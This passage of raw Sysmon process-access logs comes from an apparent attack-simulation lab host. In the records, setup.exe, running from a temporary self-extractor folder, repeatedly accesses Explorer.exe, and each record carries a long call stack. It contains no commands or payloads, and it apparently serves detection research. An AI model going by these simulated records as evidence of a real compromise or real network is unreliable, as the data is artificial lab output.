System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
